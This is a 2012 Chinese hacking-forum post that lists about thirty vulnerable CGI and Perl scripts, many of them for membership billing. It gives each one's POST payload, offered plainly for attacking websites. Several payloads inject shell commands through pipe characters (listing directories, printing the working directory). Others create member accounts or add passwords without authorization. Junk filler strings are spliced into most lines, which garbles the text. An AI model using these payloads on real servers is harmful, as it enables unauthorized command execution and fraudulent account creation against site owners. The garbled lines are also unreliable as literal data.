找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2603|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
==============================
. b, Q7 q% U" u* ]
+ G( v5 n3 I# n$ [/smspass.pl$ A% o( @) i4 z6 w; `% O  m
username=username&password=password
! y8 v" v- }# n; |/ G' s( A4 E  m" E; O. N: p" L: j/ A- S+ \
/index.cgi
* u' ~* d7 o0 a/ Nwei=ren&gen=command8 Z- A8 \2 P, O% e' ^: U8 f
. @- @9 q2 z, m1 e2 t" f
/passmaster.cgi4 D8 T# X: u* R; J1 a4 w
Action=Add&Username=Username&Password=Password, @- g5 X1 }" R+ l5 f/ ~) |/ {( U& x

2 V9 ^( y1 t2 f6 c# {  N/accountcreate.cgi
" j1 o- u% p2 Kusername=username&password=password&ref1=|echo;ls|
8 u# t7 f- d/ L3 o
2 C: `& S% o, d; t- R/form.cgi- Z0 B  o1 [# L4 b
name=xxxx&email=email&subject=xxxx&response=|echo;ls|9 M9 h! x. Q4 T* ?8 W8 v/ j. R1 b

* I' `+ ]' T5 H/addusr.pl0 T- f/ K1 p2 O- b4 ?2 `
/cgi-bin/EuroDebit/addusr.pl0 v! H. i! S; l$ [
user=username&pass=Password&confirm=Password
! M; u, h( B6 C. z" A+ @1 J* k$ \* N/ R9 M' U
/ccbill-local.asp) O8 ]3 t1 q( o$ F3 W5 I
post_values=username:password
+ T. c9 i3 {8 t, x; ]! R
) P' E; s3 z# q2 r/count.cgi* y, O$ f  o  Z; S/ `
pinfile=|echo;ls -la;exit|; s) D: {; m9 a( b* \

% ^" ^1 k' ^. @8 l" u0 C9 H/recon.cgi
( J5 X# Z# d7 J- u+ g* m4 @/recon.cgi?search
- Z. w. k4 ~+ f5 fsearchoption=1&searchfor=|echo;ls -al;exit|
( \5 a' _/ @' P, s: N! W9 W* k! t* d! P$ f
/verotelrum.pl$ e4 n% _0 M9 e2 a( a3 J
vercode=username:password:dseegsow:add:amount<&30>
, N3 {# r6 [6 `3 l% m& l
. G2 k( `, ?: T. P6 Z6 O/af.cgi
/ W4 [8 O7 h9 B/ x0 O2 a* z8 K_browser_out=|echo;ls -la;exit;|
5 c, j; G8 z) d5 R7 G) {' F3 O
9 H0 \" k1 V: q, O* V/modify.cgi& C2 `% t7 {) K( N3 A
username=username&password=password&expire=304 y3 Q8 c2 F" A2 n/ Z+ N) n( y

. @' D5 f9 a, S, [/ n. D% |/openjournal.cgi
, {; @' z* N+ n# Aedit=1&ct=2&go=|echo;ls -al;exit|2 P' m$ d) ^$ s- l
7 Y- i' t% Z: {' i4 W2 W9 z
/gx9passwd.cgi: r# S2 Z& a3 r9 J9 K8 p! p* A
cmd=ADD&user=username&pass=password! p. w; L3 l3 o, g
% |4 k. D6 i5 ^' g% b7 h$ p! U: z
/probecontrol.cgi1 w* \, J. i% f# D* S% }9 Z& @
command=enable&username=username&password=password
8 [) o/ [: ^0 D# Y4 x: x8 |7 K* [1 E6 {
/recon.cgi+ Q' I1 U) X$ ]
searchoption=3&searchfor=echo;ls -la;exit
* Y% `1 r# X7 U% Q7 c# [1 e& V8 y6 G, P: I# v4 I1 P% M# M1 p7 Z4 x
/htadd.pl
- e9 H& Y$ A, lconfigfile=|echo; ls -alt; exit* p' y% t5 n' N: A" J) r

# n. w) B& P/ z/ ^" C0 u/gx9passwd.cgi/ }' P, t8 {9 [# r* p1 v" s- ?
cmd=ADD&user=username&pass=password
. M- R; M: c5 f( O6 I! t  {, f6 s7 D6 @4 g; {& s- S
/ibill*.pl+ u8 j. A4 A8 Y9 V4 H/ R- r
reqtype=add&authpwd=authpwd&username=username&password=password  U- |6 J. G' [  t

, N' N: s4 \2 B' f/cpay.cgi
* s# V- a; a5 Y0 Y6 u: q9 I$ {command=add_member&username=username(EMAIL)&password=password(DES): z' Z" X! `: S7 ?, o9 V2 b3 M5 T

' {; x' J) M) L$ t/globill_ut.cgi1 O0 N" C. a) J1 L+ q
do=add&username=username&password=password&wpassword=password) h9 ]# P2 w. E

: S# ]5 P. g6 ]& `) |/usercontrol.cgi8 {* E) ?! Z' h8 s- Y9 Z8 U. N
command=enable&username=USER&password=PASS
) M" Y/ u" {! J6 F4 J7 w
2 Z+ ^/ O1 r  l* M; e  l/globoSALErum.cgi
! Y2 ?. X9 L# a6 B  A5 e  h8 paction=ADD&seccode=seccode&login=username&password=password
, A1 |: p8 V$ [) ~7 v6 G- N3 c% p: B% |3 m! A
/addusr.pl5 O- _& |4 U# T! H& G
user=USER&pass=PASS&confirm=PASS# A; p" @5 y& c9 m( d
" w" e# T! c/ ~  k( L. ]$ y
/pincount.cgi$ J3 w" [- e# y. I) Z' p: r( T
/cgi-bin/mastergate/pincount.cgi5 b. i5 i6 r( }3 m* Q' u
pinfile=|echo;pwd;exit|- q/ C  h3 m0 u/ O3 c- V
6 e* ?0 F6 d1 V) V0 [0 s
/accountcreate.cgi: y& M7 B% O: W: N4 Q
/cgi-bin/gateway/accountcreate.cgi* V5 r$ L7 c0 [: O5 U% J  o4 C: S
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
5 q& L& }& y; S3 y: R& s
+ u# ]; Q0 d* J  H& r# B/ _/af.cgi
, c' v! K& g) w9 ~; H/env.cgi
- w) d6 m1 x+ s! ?) dADD+;echo;pwd;exit
8 A5 [  b5 t$ o/ ~/ [) C$ p. b7 J% r) I/ O( p
/count.cgi# y* I5 m- f% [4 R; ]
pinfile=|echo;pwd;exit|* U8 m8 t$ Y0 C$ ^/ `. f
- w* `; y7 Q0 |
/recon.cgi
7 V6 @+ ~3 T$ m0 x& }& n8 y. Ksearchoption=1&searchfor=|echo;ls%20-al;exit|$ ^$ s5 c" \! Z
" @" Q3 {2 c/ B4 J1 q
/add.cgi- L1 C6 C4 K$ T  `
username=username&password=password&expire=307 {( l  U$ C* b* D: w

. u$ f: z' L0 X0 [==============================( e% G' P; L  G- s5 x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表